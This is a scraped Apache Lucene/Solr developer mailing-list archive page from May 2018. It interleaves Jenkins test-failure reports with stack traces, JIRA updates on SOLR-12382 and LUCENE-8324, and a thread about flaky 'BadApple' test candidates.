> >
> >
> > On Mon, May 21, 2018 at 12:40 PM, Alan Woodward 
> wrote:
> >> When did TestLRUQueryCache fail?  I haven’t seen that one.
> >>
> >>> On 21 May 2018, at 16:00, Erick Erickson 
> wrote:
> >>>
> >>> I'm going to change how I collect the badapple candidates. After
> >>> getting a little
> >>> overwhelmed by the number of failure e-mails (even ignoring the ones
> with
> >>> BadApple enabled), "It come to me in a vision! In a flash!"" (points
> if you
> >>> know where that comes from, hint: Old music involving a pickle).
> >>>
> >>> Since I collect failures for a week then run filter them by what's
> >>> also in Hoss's
> >>> results from two  weeks ago, that's really equivalent to creating the
> candidate
> >>> list from the intersection of the most recent week of Hoss's results
> and the
> >>> results from _three_ weeks ago. Much faster too. Thanks Hoss!
> >>>
> >>> So that's what I'll do going forward.
> >>>
> >>> Meanwhile, here's the list for this Thursday.
> >>>
> >>> BadApple candidates: I'll BadApple these on Thursday unless there are
> objections
> >>> org.apache.lucene.search.TestLRUQueryCache.testBulkScorerLocking
> >>> org.apache.solr.TestDistributedSearch.test
> >>> org.apache.solr.cloud.AddReplicaTest.test
> >>> org.apache.solr.cloud.AssignBackwardCompatibilityTest.test
> >>>
> org.apache.solr.cloud.CreateRoutedAliasTest.testCollectionNamesMustBeAbsent
> >>> org.apache.solr.cloud.CreateRoutedAliasTest.testTimezoneAbsoluteDate
> >>> org.apache.solr.cloud.CreateRoutedAliasTest.testV1
> >>> org.apache.solr.cloud.CreateRoutedAliasTest.testV2
> >>>
> org.apache.solr.cloud.DeleteReplicaTest.raceConditionOnDeleteAndRegisterReplica
> >>> org.apache.solr.cloud.LIRRollingUpdatesTest.testNewReplicaOldLeader
> >>> org.apache.solr.cloud.LeaderVoteWaitTimeoutTest.basicTest
> >>>
> org.apache.solr.cloud.LeaderVoteWaitTimeoutTest.testMostInSyncReplicasCanWinElection
> >>> org.apache.solr.cloud.MoveReplicaHDFSTest.testFailedMove
> >>> org.apache.solr.cloud.RestartWhileUpdatingTest.test
> >>>
> org.apache.solr.cloud.TestCloudConsistency.testOutOfSyncReplicasCannotBecomeLeader
> >>> org.apache.solr.cloud.TestPullReplica.testCreateDelete
> >>> org.apache.solr.cloud.TestPullReplica.testKillLeader
> >>> org.apache.solr.cloud.TestSolrCloudWithKerberosAlt.testBasics
> >>> org.apache.solr.cloud.UnloadDistributedZkTest.test
> >>>
> org.apache.solr.cloud.api.collections.CollectionsAPIAsyncDistributedZkTest.testAsyncRequests
> >>>
> org.apache.solr.cloud.api.collections.CustomCollectionTest.testCustomCollectionsAPI
> >>> org.apache.solr.cloud.autoscaling.ComputePlanActionTest.testNodeLost
> >>>
> org.apache.solr.cloud.autoscaling.IndexSizeTriggerTest.testMergeIntegration
> >>>
> org.apache.solr.cloud.autoscaling.IndexSizeTriggerTest.testSplitIntegration
> >>> org.apache.solr.cloud.autoscaling.IndexSizeTriggerTest.testTrigger
> >>> org.apache.solr.cloud.autoscaling.NodeAddedTriggerTest.testRestoreState
> >>>
> org.apache.solr.cloud.autoscaling.SearchRateTriggerIntegrationTest.testBelowSearchRate
> >>>
> org.apache.solr.cloud.autoscaling.SearchRateTriggerIntegrationTest.testDeleteNode
> >>> org.apache.solr.cloud.autoscaling.SearchRateTriggerTest.testTrigger
> >>> org.apache.solr.cloud.hdfs.HdfsUnloadDistributedZkTest.test
> >>> org.apache.solr.cloud.hdfs.StressHdfsTest.test
> >>> org.apache.solr.handler.TestSQLHandler.doTest
> >>> org.apache.solr.security.BasicAuthIntegrationTest.testBasicAuth
> >>> org.apache.solr.uninverting.TestDocTermOrds.testTriggerUnInvertLimit
> >>> org.apache.solr.update.TestHdfsUpdateLog.testFSThreadSafety
> >>> org.apache.solr.update.TestInPlaceUpdatesDistrib.test
> >>>
> >>>
> >>> Number of AwaitsFix: 21 Number of BadApples: 99
> >>>
> >>> *AwaitsFix Annotations:
> >>>
> >>>
> >>> Lucene AwaitsFix
> >>> GeoPolygonTest.java
> >>> testLUCENE8276_case3()
> >>> //@AwaitsFix(bugUrl="https://issues.apache.org/jira/browse/LUCENE-8276
> ")
> >>>
> >>> GeoPolygonTest.java
> >>> testLUCENE8280()
> >>> //@AwaitsFix(bugUrl="https://issues.apache.org/jira/browse/LUCENE-8280
> ")
> >>>
> >>> GeoPolygonTest.java
> >>> testLUCENE8281()
> >>> //@AwaitsFix(bugUrl="https://issues.apache.org/jira/browse/LUCENE-8281
> ")
> >>>
> >>> RandomGeoPolygonTest.java
> >>> testCompareBigPolygons()
> >>> //@AwaitsFix(bugUrl="https://issues.apache.org/jira/browse/LUCENE-8281
> ")
> >>>
> >>

[JENKINS] Lucene-Solr-7.x-Windows (64bit/jdk-10.0.1) - Build # 605 - Still Unstable!

2018-05-21 Thread Policeman Jenkins Server
Build: https://jenkins.thetaphi.de/job/Lucene-Solr-7.x-Windows/605/
Java: 64bit/jdk-10.0.1 -XX:+UseCompressedOops -XX:+UseConcMarkSweepGC

5 tests failed.
FAILED:  org.apache.solr.handler.TestReplicationHandler.doTestStressReplication

Error Message:
found:2[index.20180521232215658, index.20180521232234559, index.properties, 
replication.properties, snapshot_metadata]

Stack Trace:
java.lang.AssertionError: found:2[index.20180521232215658, 
index.20180521232234559, index.properties, replication.properties, 
snapshot_metadata]
at 
__randomizedtesting.SeedInfo.seed([F9AF475E73ACB2A3:220447987684DB10]:0)
at org.junit.Assert.fail(Assert.java:93)
at org.junit.Assert.assertTrue(Assert.java:43)
at 
org.apache.solr.handler.TestReplicationHandler.checkForSingleIndex(TestReplicationHandler.java:968)
at 
org.apache.solr.handler.TestReplicationHandler.checkForSingleIndex(TestReplicationHandler.java:939)
at 
org.apache.solr.handler.TestReplicationHandler.doTestStressReplication(TestReplicationHandler.java:915)
at 
java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at 
java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at 
java.base/jdk.internal.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.base/java.lang.reflect.Method.invoke(Method.java:564)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner.invoke(RandomizedRunner.java:1737)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$8.evaluate(RandomizedRunner.java:934)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$9.evaluate(RandomizedRunner.java:970)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$10.evaluate(RandomizedRunner.java:984)
at 
com.carrotsearch.randomizedtesting.rules.SystemPropertiesRestoreRule$1.evaluate(SystemPropertiesRestoreRule.java:57)
at 
org.apache.lucene.util.TestRuleSetupTeardownChained$1.evaluate(TestRuleSetupTeardownChained.java:49)
at 
org.apache.lucene.util.AbstractBeforeAfterRule$1.evaluate(AbstractBeforeAfterRule.java:45)
at 
org.apache.lucene.util.TestRuleThreadAndTestName$1.evaluate(TestRuleThreadAndTestName.java:48)
at 
org.apache.lucene.util.TestRuleIgnoreAfterMaxFailures$1.evaluate(TestRuleIgnoreAfterMaxFailures.java:64)
at 
org.apache.lucene.util.TestRuleMarkFailure$1.evaluate(TestRuleMarkFailure.java:47)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.ThreadLeakControl$StatementRunner.run(ThreadLeakControl.java:368)
at 
com.carrotsearch.randomizedtesting.ThreadLeakControl.forkTimeoutingTask(ThreadLeakControl.java:817)
at 
com.carrotsearch.randomizedtesting.ThreadLeakControl$3.evaluate(ThreadLeakControl.java:468)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner.runSingleTest(RandomizedRunner.java:943)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$5.evaluate(RandomizedRunner.java:829)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$6.evaluate(RandomizedRunner.java:879)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$7.evaluate(RandomizedRunner.java:890)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.rules.SystemPropertiesRestoreRule$1.evaluate(SystemPropertiesRestoreRule.java:57)
at 
org.apache.lucene.util.AbstractBeforeAfterRule$1.evaluate(AbstractBeforeAfterRule.java:45)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
org.apache.lucene.util.TestRuleStoreClassName$1.evaluate(TestRuleStoreClassName.java:41)
at 
com.carrotsearch.randomizedtesting.rules.NoShadowingOrOverridesOnMethodsRule$1.evaluate(NoShadowingOrOverridesOnMethodsRule.java:40)
at 
com.carrotsearch.randomizedtesting.rules.NoShadowingOrOverridesOnMethodsRule$1.evaluate(NoShadowingOrOverridesOnMethodsRule.java:40)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
org.apache.lucene.util.TestRuleAssertionsRequired$1.evaluate(TestRuleAssertionsRequired.java:53)
at 
org.apache.lucene.util.TestRuleMarkFailure$1.evaluate(TestRuleMarkFailure.java:47)
at 
org.apache.lucene.util.TestRuleIgnoreAfterMaxFailures$1.evaluate(TestRuleIgnoreAfterMaxFailures.java:64)
at 
org.apache.lucene.util.TestRuleIgnoreTestSuites$1.evaluate(TestRuleIgnoreTestSuites.java:54)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.ThreadLeakContr

[jira] [Updated] (SOLR-12382) new data not seen immediately after commit() on SolrCloud collection with only TLOG and PULL replicas

2018-05-21 Thread Nguyen Nguyen (JIRA)

 [ 
https://issues.apache.org/jira/browse/SOLR-12382?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Nguyen Nguyen updated SOLR-12382:
-
Environment: 
7.3 SolrCloud with 3 shards, each shard has 2 TLOG replicas + 1 PULL replica

 

Commit settings

{{ }}
{{  15000 }}
{{  false }}
{{}}
{{ }}
{{  -1 }}
{{}}

 

  was:
7.3 SolrCloud with 3 shards, each shard has 2 TLOG replicas + 1 PULL replica

 

Commit settings

{{ }}{{15000 false 
}}{{ }}{{ -1 }}

 


> new data not seen immediately after commit() on SolrCloud collection with 
> only TLOG and PULL replicas
> -
>
> Key: SOLR-12382
> URL: https://issues.apache.org/jira/browse/SOLR-12382
> Project: Solr
>  Issue Type: Bug
>  Security Level: Public(Default Security Level. Issues are Public) 
>Affects Versions: 7.3
> Environment: 7.3 SolrCloud with 3 shards, each shard has 2 TLOG 
> replicas + 1 PULL replica
>  
> Commit settings
> {{ }}
> {{  15000 }}
> {{  false }}
> {{}}
> {{ }}
> {{  -1 }}
> {{}}
>  
>Reporter: Nguyen Nguyen
>Priority: Major
>
> On collection with TLOG/PULL replicas, queries that follow right after 
> commit(waitSearch:true) would NOT return newly added data until several 
> seconds later.
> Tested same scenario on another collection with only NRT replicas and found 
> that it behaved as expected (query returned newly added data right after 
> commit(waitSearch:true) was called.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[JENKINS] Lucene-Solr-NightlyTests-master - Build # 1548 - Still Unstable

2018-05-21 Thread Apache Jenkins Server
Build: https://builds.apache.org/job/Lucene-Solr-NightlyTests-master/1548/

12 tests failed.
FAILED:  
org.apache.solr.cloud.autoscaling.SearchRateTriggerIntegrationTest.testDeleteNode

Error Message:
unexpected DELETENODE status: 
{responseHeader={status=0,QTime=72},status={state=notfound,msg=Did not find 
[search_rate_trigger3/20ee492921697eTaao99t7zbi77399vzpf7cge6f/0] in any tasks 
queue}}

Stack Trace:
java.lang.AssertionError: unexpected DELETENODE status: 
{responseHeader={status=0,QTime=72},status={state=notfound,msg=Did not find 
[search_rate_trigger3/20ee492921697eTaao99t7zbi77399vzpf7cge6f/0] in any tasks 
queue}}
at 
__randomizedtesting.SeedInfo.seed([7567D9CAA6EF18CE:57F51748912597B3]:0)
at org.junit.Assert.fail(Assert.java:93)
at 
org.apache.solr.cloud.autoscaling.SearchRateTriggerIntegrationTest.lambda$testDeleteNode$6(SearchRateTriggerIntegrationTest.java:668)
at java.util.ArrayList.forEach(ArrayList.java:1257)
at 
org.apache.solr.cloud.autoscaling.SearchRateTriggerIntegrationTest.testDeleteNode(SearchRateTriggerIntegrationTest.java:660)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at 
sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at 
sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner.invoke(RandomizedRunner.java:1737)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$8.evaluate(RandomizedRunner.java:934)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$9.evaluate(RandomizedRunner.java:970)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$10.evaluate(RandomizedRunner.java:984)
at 
com.carrotsearch.randomizedtesting.rules.SystemPropertiesRestoreRule$1.evaluate(SystemPropertiesRestoreRule.java:57)
at 
org.apache.lucene.util.TestRuleSetupTeardownChained$1.evaluate(TestRuleSetupTeardownChained.java:49)
at 
org.apache.lucene.util.AbstractBeforeAfterRule$1.evaluate(AbstractBeforeAfterRule.java:45)
at 
org.apache.lucene.util.TestRuleThreadAndTestName$1.evaluate(TestRuleThreadAndTestName.java:48)
at 
org.apache.lucene.util.TestRuleIgnoreAfterMaxFailures$1.evaluate(TestRuleIgnoreAfterMaxFailures.java:64)
at 
org.apache.lucene.util.TestRuleMarkFailure$1.evaluate(TestRuleMarkFailure.java:47)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.ThreadLeakControl$StatementRunner.run(ThreadLeakControl.java:368)
at 
com.carrotsearch.randomizedtesting.ThreadLeakControl.forkTimeoutingTask(ThreadLeakControl.java:817)
at 
com.carrotsearch.randomizedtesting.ThreadLeakControl$3.evaluate(ThreadLeakControl.java:468)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner.runSingleTest(RandomizedRunner.java:943)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$5.evaluate(RandomizedRunner.java:829)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$6.evaluate(RandomizedRunner.java:879)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$7.evaluate(RandomizedRunner.java:890)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.rules.SystemPropertiesRestoreRule$1.evaluate(SystemPropertiesRestoreRule.java:57)
at 
org.apache.lucene.util.AbstractBeforeAfterRule$1.evaluate(AbstractBeforeAfterRule.java:45)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
org.apache.lucene.util.TestRuleStoreClassName$1.evaluate(TestRuleStoreClassName.java:41)
at 
com.carrotsearch.randomizedtesting.rules.NoShadowingOrOverridesOnMethodsRule$1.evaluate(NoShadowingOrOverridesOnMethodsRule.java:40)
at 
com.carrotsearch.randomizedtesting.rules.NoShadowingOrOverridesOnMethodsRule$1.evaluate(NoShadowingOrOverridesOnMethodsRule.java:40)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
org.apache.lucene.util.TestRuleAssertionsRequired$1.evaluate(TestRuleAssertionsRequired.java:53)
at 
org.apache.lucene.util.TestRuleMarkFailure$1.evaluate(TestRuleMarkFailure.java:47)
at 
org.apache.lucene.util.TestRuleIgnoreAfterMaxFailures$1.evaluate(TestRuleIgnoreAfterMaxFailures.java:64)
at 
org.apache.lucene.util.TestRuleIgnoreTestSuites$1.evaluate(TestRuleIgnoreTestSuites.java:54)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(St

[jira] [Updated] (SOLR-12382) new data not seen immediately after commit() on SolrCloud collection with only TLOG and PULL replicas

2018-05-21 Thread Nguyen Nguyen (JIRA)

 [ 
https://issues.apache.org/jira/browse/SOLR-12382?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Nguyen Nguyen updated SOLR-12382:
-
Environment: 
7.3 SolrCloud with 3 shards, each shard has 2 TLOG replicas + 1 PULL replica

 

Commit settings

{{ }}{{15000 false 
}}{{ }}{{ -1 }}

 

  was:
7.3 SolrCloud with 3 shards, each shard has 2 TLOG replicas + 1 PULL replica

 

Commit settings

 15000 false 
  -1 

 

Description: 
On collection with TLOG/PULL replicas, queries that follow right after 
commit(waitSearch:true) would NOT return newly added data until several seconds 
later.

Tested same scenario on another collection with only NRT replicas and found 
that it behaves as expected (query returns newly added data right after 
commit(waitSearch:true) is called.

  was:On collection with TLOG/PULL replicas, queries that follow right after 
commit(waitSearch:true) would return newly added data.  


> new data not seen immediately after commit() on SolrCloud collection with 
> only TLOG and PULL replicas
> -
>
> Key: SOLR-12382
> URL: https://issues.apache.org/jira/browse/SOLR-12382
> Project: Solr
>  Issue Type: Bug
>  Security Level: Public(Default Security Level. Issues are Public) 
>Affects Versions: 7.3
> Environment: 7.3 SolrCloud with 3 shards, each shard has 2 TLOG 
> replicas + 1 PULL replica
>  
> Commit settings
> {{ }}{{15000 
> false }}{{ }}{{ 
> -1 }}
>  
>Reporter: Nguyen Nguyen
>Priority: Major
>
> On collection with TLOG/PULL replicas, queries that follow right after 
> commit(waitSearch:true) would NOT return newly added data until several 
> seconds later.
> Tested same scenario on another collection with only NRT replicas and found 
> that it behaves as expected (query returns newly added data right after 
> commit(waitSearch:true) is called.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Updated] (SOLR-12382) new data not seen immediately after commit() on SolrCloud collection with only TLOG and PULL replicas

2018-05-21 Thread Nguyen Nguyen (JIRA)

 [ 
https://issues.apache.org/jira/browse/SOLR-12382?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Nguyen Nguyen updated SOLR-12382:
-
Description: 
On collection with TLOG/PULL replicas, queries that follow right after 
commit(waitSearch:true) would NOT return newly added data until several seconds 
later.

Tested same scenario on another collection with only NRT replicas and found 
that it behaved as expected (query returned newly added data right after 
commit(waitSearch:true) was called.

  was:
On collection with TLOG/PULL replicas, queries that follow right after 
commit(waitSearch:true) would NOT return newly added data until several seconds 
later.

Tested same scenario on another collection with only NRT replicas and found 
that it behaves as expected (query returns newly added data right after 
commit(waitSearch:true) is called.


> new data not seen immediately after commit() on SolrCloud collection with 
> only TLOG and PULL replicas
> -
>
> Key: SOLR-12382
> URL: https://issues.apache.org/jira/browse/SOLR-12382
> Project: Solr
>  Issue Type: Bug
>  Security Level: Public(Default Security Level. Issues are Public) 
>Affects Versions: 7.3
> Environment: 7.3 SolrCloud with 3 shards, each shard has 2 TLOG 
> replicas + 1 PULL replica
>  
> Commit settings
> {{ }}{{15000 
> false }}{{ }}{{ 
> -1 }}
>  
>Reporter: Nguyen Nguyen
>Priority: Major
>
> On collection with TLOG/PULL replicas, queries that follow right after 
> commit(waitSearch:true) would NOT return newly added data until several 
> seconds later.
> Tested same scenario on another collection with only NRT replicas and found 
> that it behaved as expected (query returned newly added data right after 
> commit(waitSearch:true) was called.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Created] (SOLR-12382) new data not seen immediately after commit() on SolrCloud collection with only TLOG and PULL replicas

2018-05-21 Thread Nguyen Nguyen (JIRA)
Nguyen Nguyen created SOLR-12382:


 Summary: new data not seen immediately after commit() on SolrCloud 
collection with only TLOG and PULL replicas
 Key: SOLR-12382
 URL: https://issues.apache.org/jira/browse/SOLR-12382
 Project: Solr
  Issue Type: Bug
  Security Level: Public (Default Security Level. Issues are Public)
Affects Versions: 7.3
 Environment: 7.3 SolrCloud with 3 shards, each shard has 2 TLOG 
replicas + 1 PULL replica

 

Commit settings

 15000 false 
  -1 

 
Reporter: Nguyen Nguyen


On collection with TLOG/PULL replicas, queries that follow right after 
commit(waitSearch:true) would return newly added data.  



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Commented] (LUCENE-8324) Unreferenced files of dropped segments should be released

2018-05-21 Thread Nhat Nguyen (JIRA)

[ 
https://issues.apache.org/jira/browse/LUCENE-8324?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16483044#comment-16483044
 ] 

Nhat Nguyen commented on LUCENE-8324:
-

Thanks [~simonw] and [~mikemccand]

> Unreferenced files of dropped segments should be released
> -
>
> Key: LUCENE-8324
> URL: https://issues.apache.org/jira/browse/LUCENE-8324
> Project: Lucene - Core
>  Issue Type: Bug
>  Components: core/index
>Affects Versions: 7.4, master (8.0)
>Reporter: Nhat Nguyen
>Priority: Major
> Attachments: LUCENE-8324.patch, release-files.patch
>
>
> {quote} This has the side-effect that flushed segments that are 100% hard 
> deleted are also
> cleaned up right after they are flushed, previously these segments were 
> sticking
> around for a while until they got picked for a merge or received another 
> delete.{quote}
>  
> Since LUCENE-8253, a fully deleted segment is dropped immediately when it's 
> flushed, however, its files might be kept around even after a commit. In 
> other words, we may have unreferenced files which are retained by Deleter.
> I am not entirely sure if we should fix this but it's nice to have a 
> consistent content between current files and commit points as before.
> I attached a failed test for this.
> /cc [~simonw]



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[JENKINS] Lucene-Solr-master-Windows (64bit/jdk-10.0.1) - Build # 7330 - Unstable!

2018-05-21 Thread Policeman Jenkins Server
Build: https://jenkins.thetaphi.de/job/Lucene-Solr-master-Windows/7330/
Java: 64bit/jdk-10.0.1 -XX:+UseCompressedOops -XX:+UseParallelGC

1 tests failed.
FAILED:  org.apache.solr.common.util.TestTimeSource.testEpochTime

Error Message:
SimTimeSource:50.0 time diff=1955

Stack Trace:
java.lang.AssertionError: SimTimeSource:50.0 time diff=1955
at 
__randomizedtesting.SeedInfo.seed([6AAFCFA7A002F8C4:52C3BC8234D25A82]:0)
at org.junit.Assert.fail(Assert.java:93)
at org.junit.Assert.assertTrue(Assert.java:43)
at 
org.apache.solr.common.util.TestTimeSource.doTestEpochTime(TestTimeSource.java:52)
at 
org.apache.solr.common.util.TestTimeSource.testEpochTime(TestTimeSource.java:32)
at 
java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at 
java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at 
java.base/jdk.internal.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.base/java.lang.reflect.Method.invoke(Method.java:564)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner.invoke(RandomizedRunner.java:1737)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$8.evaluate(RandomizedRunner.java:934)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$9.evaluate(RandomizedRunner.java:970)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$10.evaluate(RandomizedRunner.java:984)
at 
com.carrotsearch.randomizedtesting.rules.SystemPropertiesRestoreRule$1.evaluate(SystemPropertiesRestoreRule.java:57)
at 
org.apache.lucene.util.TestRuleSetupTeardownChained$1.evaluate(TestRuleSetupTeardownChained.java:49)
at 
org.apache.lucene.util.AbstractBeforeAfterRule$1.evaluate(AbstractBeforeAfterRule.java:45)
at 
org.apache.lucene.util.TestRuleThreadAndTestName$1.evaluate(TestRuleThreadAndTestName.java:48)
at 
org.apache.lucene.util.TestRuleIgnoreAfterMaxFailures$1.evaluate(TestRuleIgnoreAfterMaxFailures.java:64)
at 
org.apache.lucene.util.TestRuleMarkFailure$1.evaluate(TestRuleMarkFailure.java:47)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.ThreadLeakControl$StatementRunner.run(ThreadLeakControl.java:368)
at 
com.carrotsearch.randomizedtesting.ThreadLeakControl.forkTimeoutingTask(ThreadLeakControl.java:817)
at 
com.carrotsearch.randomizedtesting.ThreadLeakControl$3.evaluate(ThreadLeakControl.java:468)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner.runSingleTest(RandomizedRunner.java:943)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$5.evaluate(RandomizedRunner.java:829)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$6.evaluate(RandomizedRunner.java:879)
at 
com.carrotsearch.randomizedtesting.RandomizedRunner$7.evaluate(RandomizedRunner.java:890)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.rules.SystemPropertiesRestoreRule$1.evaluate(SystemPropertiesRestoreRule.java:57)
at 
org.apache.lucene.util.AbstractBeforeAfterRule$1.evaluate(AbstractBeforeAfterRule.java:45)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
org.apache.lucene.util.TestRuleStoreClassName$1.evaluate(TestRuleStoreClassName.java:41)
at 
com.carrotsearch.randomizedtesting.rules.NoShadowingOrOverridesOnMethodsRule$1.evaluate(NoShadowingOrOverridesOnMethodsRule.java:40)
at 
com.carrotsearch.randomizedtesting.rules.NoShadowingOrOverridesOnMethodsRule$1.evaluate(NoShadowingOrOverridesOnMethodsRule.java:40)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
org.apache.lucene.util.TestRuleAssertionsRequired$1.evaluate(TestRuleAssertionsRequired.java:53)
at 
org.apache.lucene.util.TestRuleMarkFailure$1.evaluate(TestRuleMarkFailure.java:47)
at 
org.apache.lucene.util.TestRuleIgnoreAfterMaxFailures$1.evaluate(TestRuleIgnoreAfterMaxFailures.java:64)
at 
org.apache.lucene.util.TestRuleIgnoreTestSuites$1.evaluate(TestRuleIgnoreTestSuites.java:54)
at 
com.carrotsearch.randomizedtesting.rules.StatementAdapter.evaluate(StatementAdapter.java:36)
at 
com.carrotsearch.randomizedtesting.ThreadLeakControl$StatementRunner.run(ThreadLeakControl.java:368)
at java.base/java.lang.Thread.run(Thread.java:844)




Build Log:
[...truncated 15834 lines...]
   [junit4] Suite: org.apache.solr.common.util.TestTimeSource
   [junit4]   2> Creating dataDir: 
C:\Users\jenkins\workspace\Lucene-Solr-master-Windows\solr\build\solr-solrj\tes

Re: BadApple candidates

2018-05-21 Thread Alan Woodward
Looks like it was an OOM, can you leave that one be for now?

> On 21 May 2018, at 19:11, Erick Erickson  wrote:
> 
> Alan:
> 
> http://fucit.org/solr-jenkins-reports/job-data/sarowe/Lucene-Solr-Nightly-7.x/256/
> 
> You can get there from Hoss's rollup reports here:
> http://fucit.org/solr-jenkins-reports/failure-report.html
> 
> To be included in any potential BadApple, two things must be true:
> 1> it must have failed since last Monday
> 2> it must have failed in the report collected two weeks ago Monday
> 
> Erick
> 
> 
> On Mon, May 21, 2018 at 12:40 PM, Alan Woodward  wrote:
>> When did TestLRUQueryCache fail?  I haven’t seen that one.
>> 
>>> On 21 May 2018, at 16:00, Erick Erickson  wrote:
>>> 
>>> I'm going to change how I collect the badapple candidates. After
>>> getting a little
>>> overwhelmed by the number of failure e-mails (even ignoring the ones with
>>> BadApple enabled), "It come to me in a vision! In a flash!"" (points if you
>>> know where that comes from, hint: Old music involving a pickle).
>>> 
>>> Since I collect failures for a week then run filter them by what's
>>> also in Hoss's
>>> results from two  weeks ago, that's really equivalent to creating the 
>>> candidate
>>> list from the intersection of the most recent week of Hoss's results and the
>>> results from _three_ weeks ago. Much faster too. Thanks Hoss!
>>> 
>>> So that's what I'll do going forward.
>>> 
>>> Meanwhile, here's the list for this Thursday.
>>> 
>>> BadApple candidates: I'll BadApple these on Thursday unless there are 
>>> objections
>>> org.apache.lucene.search.TestLRUQueryCache.testBulkScorerLocking
>>> org.apache.solr.TestDistributedSearch.test
>>> org.apache.solr.cloud.AddReplicaTest.test
>>> org.apache.solr.cloud.AssignBackwardCompatibilityTest.test
>>> org.apache.solr.cloud.CreateRoutedAliasTest.testCollectionNamesMustBeAbsent
>>> org.apache.solr.cloud.CreateRoutedAliasTest.testTimezoneAbsoluteDate
>>> org.apache.solr.cloud.CreateRoutedAliasTest.testV1
>>> org.apache.solr.cloud.CreateRoutedAliasTest.testV2
>>> org.apache.solr.cloud.DeleteReplicaTest.raceConditionOnDeleteAndRegisterReplica
>>> org.apache.solr.cloud.LIRRollingUpdatesTest.testNewReplicaOldLeader
>>> org.apache.solr.cloud.LeaderVoteWaitTimeoutTest.basicTest
>>> org.apache.solr.cloud.LeaderVoteWaitTimeoutTest.testMostInSyncReplicasCanWinElection
